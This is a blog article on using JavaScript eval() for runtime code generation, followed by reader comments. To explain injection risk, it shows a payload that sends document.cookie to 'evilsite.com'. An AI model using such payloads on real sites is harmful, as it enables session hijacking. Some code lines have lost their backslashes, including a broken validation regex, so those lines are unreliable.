eval() considered useful: code generation in JavaScript

If ever a feature of JavaScript was considered harmful, it’s eval(). It’s so commonly abused that if I’m interviewing a JS web developer, I usually ask something along the lines of “what is eval(), and why shouldn’t you use it”. It’s so commonly abused that Yahoo JavaScript architect Douglas Cronkford considers it “evil”, and his JavaScript style checker JSLint reports use of it as an error.

People dislike eval() because it’s perceived to be slow and insecure. In this article I describe a way to use eval() to make your application faster.

Watch out! This is a black belt technique. Rasmus Lerdorf, the creator of PHP, once wrote that “if eval() is the answer, you’re almost certainly asking the wrong question”. Use it as a last resort when other optimisations have failed. Or to show off.

Edited in 2015 to add: modern browsers are all very fast at executing JavaScript. Some of that speed comes through optimisations like the one described in this article, done automatically for you. This hack is therefore no longer necessary.

Burn the witch!

Dislike of eval() stems almost entirely from the commonly seen schoolboy error of using eval() whenever you need to access a variable whose name is stored in another variable:

// incorrect way of setting a member variable:
eval("myObject." + varName + " = 'new value'");
 
// the schoolboy should have done this:
myObject[varName] = 'new value';

Not only is the first version 20 times slower (tested on Firefox), but it is also an invitation to code execution attacks. Imagine what would happen if an attacker managed to set varName to this:

foo='new value';window.i = new Image(); i.src = 'http://evilsite.com/" + track.php?cookie=' + escape(document.cookie);//

Yup, that would set myObject.foo to ‘new value’, then create a new image, loaded from the attacker’s site. The image is served from a script that records the cookie passed to it. If the script is clever, it will return a valid image so that no errors are produced, and nobody is the wiser. If your web application doesn’t tie a session to a single IP address (like most PHP applications for example), the attacker can now extract your session ID from the cookie and log in as you. Ouch.

In fact, it’s not just beginners that fall for this. This is a real example collected from an old tutorial on the respected (by me at least) site The Code Project:

// this function is supposed to take a string class name, create an
// instance of that class, and copy all of the members of the new
// instance into a dictionary. ${DEITY} knows why you'd want to do
// that, but that's not the point of this sample
 
// incorrect way of accessing members:
function CreateCollection(ClassName) {
    var obj=new Array();
    eval("var t=new "+ClassName+"()");
    for(_item in t) {
        eval("obj."+_item+"=t."+_item);
    }
    return obj;
}
 
// the above function should read:
function CreateCollection(ClassName) {
    var obj = {}, _item, t = new window[ClassName]();
    for(_item in t) {
        obj[_item] = t[_item];
    }
    return obj;
}

Unless the witch {is: “made”, of: “JSON”}!

With the growing popularity of JSON, poor little eval has finally become respected. It might be slow compared to square[bracket] member access, but since JSON is actually JavaScript code, it’s much faster to parse JSON using eval than it is to parse XML using the DOM.

But there is another way that eval() can speed up your application…

Metaprogramming: a contrived example

JavaScript is a dynamic language and some things are just slow, in particular, function calls and for(x in y) loops. “Slow” is relative here – we’re talking microseconds, but these things can really add up if you’re doing them inside a loop that runs a few thousand times. This is a pity, because functions and loops help you write generic code that can be reused in other situations.

The problem is made worse when you consider that JavaScript only has one thread, so if a script spends a second calculating something, the whole UI will freeze up for a second – no buttons can be clicked or keystrokes typed.

Let’s say you want to create a kind of class called a Multiplier. This class is constructed with a data object and a coefficient number. The data object is stored in a public variable, and every time the multiply() method is called, every number anywhere in the data object is multiplied by the coefficient. For example:

var mul = new Multiplier({a:10, subObject:{b: 11, c:"foo"}}, 2);
// mul.data == {a:10, subObject:{b: 11, c:"foo"}}
mul.multiply();
// mul.data == {a:20, subObject:{b: 22, c:"foo"}}
mul.multiply();
// mul.data == {a:40, subObject:{b: 44, c:"foo"}}

As I said, it’s a contrived example, but the pattern behind it is common: you have to do something to an object, but you don’t know the structure of the object in advance.

It’s easy to implement. Here’s one possible obvious implementation:

// this Multiplier uses reflection - i.e. for (x in y) - to
// traverse the data object
function ReflectingMultiplier(data, coefficient) {
    this.data = data;
    this.coefficient = coefficient;
}
ReflectingMultiplier.prototype.multiply = function() {
    this._multiply(this.data);
}
ReflectingMultiplier.prototype._multiply = function(data) {
    var prop;
    for (prop in data) {
        switch (typeof data[prop]) {
            case "number":
                data[prop] *= this.coefficient;
                break;
            case "object":
                this._multiply(data[prop]);
                break;
        }
    }
}

The problem with the above is that it’s slow. In order to carry out two multiplication operations, each of which are extremely quick, you use two function calls and two for loops.

Performance test

// ReflectingMultiplier test code:  calculate the average time taken
// to call multiply()
var TIMES = 100000;
var obj = {a:1, b:{foo:2, bar:4}, c:{quux:5, blarty:6}};
var mul = new ReflectingMultiplier(obj, 2);
var start = new Date();
for(var i=0; i<TIMES; i++) {
    mul.multiply();
}
var end = new Date();
var time = end.getTime() - start.getTime();
alert((1000 * time / TIMES) + " microseconds average");

The problem here is that the multiply() method inspects the object every time it is called, even though the data object never changes. If you knew the structure of the data object in advance, you could write a much better implementation:

// if you know the coefficient and the structure of the data object,
// everything is much simpler
ReflectingMultiplier.prototype.multiply = function() {
    this.data.a *= 2;
    this.data.b.foo *= 2;
    this.data.b.bar *= 2;
    this.data.c.quux *= 2;
    this.data.c.blarty *= 2;
}

But you don’t know the structure in advance, so you can’t. So what’s the solution… Write a new function for every structure of data object? Well you could, but that would be a pain to maintain.

Code generation to the rescue

The solution, as you have probably guessed from the title of the article, is to inspect the data object once and generate code for an appropriate multiply() method. You then use eval() to create the method.

It’s nice to have company

Robert O’Callahan at mozilla has used this technique to create a JIT’ed code interpreter in JavaScript, which is pretty damn cool.

Here’s an implementation of the multiplier that does this:

// this Multiplier compiles a multiply() function in its constructor
function CompilingMultiplier(data, coefficient) {
    this.data = data;
    // compile multiply function
    var codeString = "this.multiply = function() {n";
    var paths = this.getIntegerPaths(data);
    for (var i=0; i<paths.length; i++) {
        codeString += "    this.data." + paths[i]
                   + " *= " + coefficient + ";n";
    }
    codeString += "}";
    eval(codeString);
    this.generatedCode = "Generated code:nn" + codeString;
}
// e.g. if data={a:10, subObject:{b: 11, c:"foo"},
// return ["a", "subObject.b"]
CompilingMultiplier.prototype.getIntegerPaths = function(data) {
    var paths = [];
    this._getIntegerPaths(data, paths, []);
    return paths;
}
CompilingMultiplier.prototype._getIntegerPaths
                = function(data, accumulator, stack) {
    var prop, stackPos = stack.length;
    for (prop in data) {
        // regex to protect from code execution attacks -
        // only allow valid variable names
        if (!prop.match(/^w+$/)) {
            continue;
        }
        stack[stackPos] = prop;
        switch (typeof data[prop]) {
            case "number":
                accumulator.push(stack.join("."));
                break;
            case "object":
                this._getIntegerPaths(data[prop], accumulator, stack);
                break;
        }
    }
    stack.length = stack.length-1;
}
// It would actually be more appropriate to use
// "this.multiply = new Function(...)", which
// is a wrapper around eval for creating functions,
// but I'm trying to prove a point here :o)

Performance test

// CompilingMultiplier test code:  calculate the
// average time taken to call multiply()
var TIMES = 1000000;
var compileStart = new Date();
var data = {a:1, b:{foo:2, bar:4}, c:{quux:5, blarty:6}};
var mul = new CompilingMultiplier(data, 2);
var compileEnd = new Date();
 
var runStart = new Date();
for(var i=0; i<TIMES; i++) {
    mul.multiply();
}
var runEnd = new Date();
document.getElementById('generatedCode').innerHTML
    = mul.generatedCode.replace(/n/g, "<br>");
alert(
    (compileEnd.getTime() - compileStart.getTime())
    + " milliseconds compilation, "
    + (1000 * (runEnd.getTime() - runStart.getTime()) / TIMES)
    + " microseconds average run time");


Your milage may vary, but I found the compiling version to be about 5 times faster than the reflecting version.

Further optimisation

The compiling stage takes time – 850 microseconds in my tests. If you’re using multiply() less than 30 times for each compilation, it’s actually faster to use the reflecting version. One good way to make sure you compile as little as possible is to cache the generated functions. If you happen to know that each instance of the classes you’re using has the same internal structure, you can do this:

// Caching the generated function so that only one
// function is generated for any given class
function CompilingMultiplier(data, coefficient) {
    // every object has a hidden member variable 'constructor',
    // which is a reference to its constructor function that
    // doesn't show up in a for(x in y) loop.
    if (data.constructor.__multiplierCache) {
        this.multiplier = data.constructor.__multiplierCache;
    } else {
        ... compile this.multiply function ...
        data.constructor.__multiplierCache = this.multiply;
    }
}

In summary

Use this technique when…

  • you have a loop that runs many times and/or a recursive algorithm, and most of the time is spent managing loop variables and function calls rather than doing useful work.
  • you are inspecting a structure before using it, and you know that the structure isn’t going to change.
  • you can’t see any easier ways of optimising the loop.

Good luck!

15 thoughts on “eval() considered useful: code generation in JavaScript”

  1. Good article, Bernie. I had run across Doug’s comments about eval on his jslint page, and considered them for a while, but there are some things you just have to use it for. It’s in the language for a reason, and the language wasn’t invented by dummies (even though it’s a bit quirky and they probably made a few mistakes in its definition). To declare eval evil because bad programmers use it badly, you’d also have to declare that looping is evil because bad programmers use it badly… etc.

    It’s good to see you paying attention to performance issues in Javascript. IMO, too little attention is given to that subject, but in Javascript, it’s even more important to pay careful attention to that stuff. I’ve been thinking about some subjects for a “High Performance Javascript” article. Stuff like: a.b[i].c.d.f{‘name’} is slow (and dangerous). Cache a.b[i].c.d.f if you’re going to access that object than once… just how slow is b[i]… how slow is string concatentation… performance characteristics of regular expressions… blah, blah…

  2. You’re right, performance in JS is overlooked, perhaps because developers tend to have fast machines (and also because slow code makes their user’s computers crawl, not the server: it might be slow but the slowness in infinitely scalable :o)

    A couple of links to articles about optimisation:

    This old but classic article introduces many useful and sometimes counterintuitive loop optimisations, though it’s age is showing – it contains nothing on the new generation of browsers, and nothing on object-oriented JavaScript.

    This three part article from MSDN is a treasure trove of IE-specific tips, but watch out because the second “Cache Function Pointers at all costs” example will actually break non IE browsers.

    I think there’s scope for an up to date compendium of tips. What would the ideal format be, a wiki?

    1. There you wrote about an old but classicle article introducing many useful optimixations though it is age is showing. Even eval() could not parse it.

  3. Hmmm, a wiki would be a really good way to accumulate the info… benchmarks, tips and techniques, code samples, etc….

  4. It would need to be a custom wiki, because there’s structure. It would be a shame to rely on people e.g. putting a box in the top left corner of each page with the tip summary (as in the first link in my last post). I think TWiki would let you create forms so each page looks similar.

    Perhaps people could submit code fragments in a certain way, and the fragment would get tested using some standard timing widget.

    Interesting. If only I didn’t need sleep!

  5. I’m sure I ran across a timing widget at one point… firebug has a profiler that might be useful, but not necessarily in some automated fashion. How hard could it be to write one?

    Ahhhh yes… sleep… I sort of remember what that’s like…

  6. That’s perfect because the tests are posted as HTML, and run automatically.

    Now imagine anyone coming to that page, running the tests, and the results being posted back to the server for collating.

    You’d run it on a domain with no cookies or login, so there’s nothing for the scripts to steal if someone posts malicious code.

  7. It would be challenging to account for the variables, like cpu speed, memory size, etc. Easier to account for the browser being used… But if you got enough people to do it, in the end statistics would win out and you could derive a statistically valid cost of specific operations… in the end you wouldn’t be able to say “this is the cost to YOU for this operation,” but you -would- be able to say “this is the relative cost of these two operations, and if you use the faster of the two, on average your site will perform better for all visitors.” THAT would be cool, and in fact much more valuable…

  8. Indeed. If the data set is large enough, one could present standard deviations, or some more user friendly measure of variance, to indicate if an operation is generally fast but seems to really kill some browsers / configurations.

    I had another look at TWiki, it looks suitable for creating a site where people can submit code into a standard test suite, but not suitable for collecting the results from visitors. We’d probably need a custom web app for that.

    I am looking for an excuse to learn Ruby on Rails, but there’s so little time…

    The next big block of time I have free is my Honeymoon in 3 months, and I’d be dead for even suggesting that I bring the laptop ;o)

  9. Awww go ahead and sneak the laptop into the luggage… you gotta have somewhere to download the digital pics, you know… ;)

  10. I’ve written a very compact client-side HTML generation library (under 4k)… and it very heavily relies upon a single eval() statement to define hundreds of functions named after the HTML tag/attributes that they implement. It is very fast, and in benchmark tests, it beats both DOM and innerHTML methods of creating large constructs. In the website referenced, I’ve provided an online HTML() Construction Kit tool that allows you see how clientlets get rendered.

    In the example, the 115 byte expression…

    [[o=’O’,x=’X’,o].TD(),[x,x,x].TD(STYLE(background_color(‘red’))),[x,o,o].TD()].TR().TABLE(BORDER(1)+CELLPADDING(5))

    …renders 255 bytes of flawless HTML…

    <table border="1" cellpadding="5"><tr><td>O</td><td>X</td><td>O</td></tr><tr><td style=" background-color: red;">X</td><td style=" background-color: red;">X</td><td style=" background-color: red;">X</td></tr><tr><td>X</td><td>O</td><td>O</td></tr></table>

    In fact, this library is the basis of a pop-up calendar (a date selector) implemented in well under 5k.

  11. “what is eval(), and why shouldn’t you use it” is a terrible question for an interview – it is counter-indicative, ie, a candidate who has used it extensively is more likely to know the answer than an candidate who read once that it is evil, found alternative methods, and forgot all about eval(). The second candidate is the better choice, but is unlikely to know the answer because they have never encountered the problem.

    So, what is an example of a counter-indicative question, and why shouldn’t you use it?

    1. Sure, I don’t literally ask “what is eval(), and why shouldn’t you use it”, the question is more likely to be “what does eval do”, followed by “what is it useful for”. Warning bells ring if I get an example that can be easily done without eval().

      1. I only jumped on it because it was covered in a class I took once upon a time, and because in interviews I have been asked things like “what is the best way to debug….” I didn’t know – never made that mistake!

Comments are closed.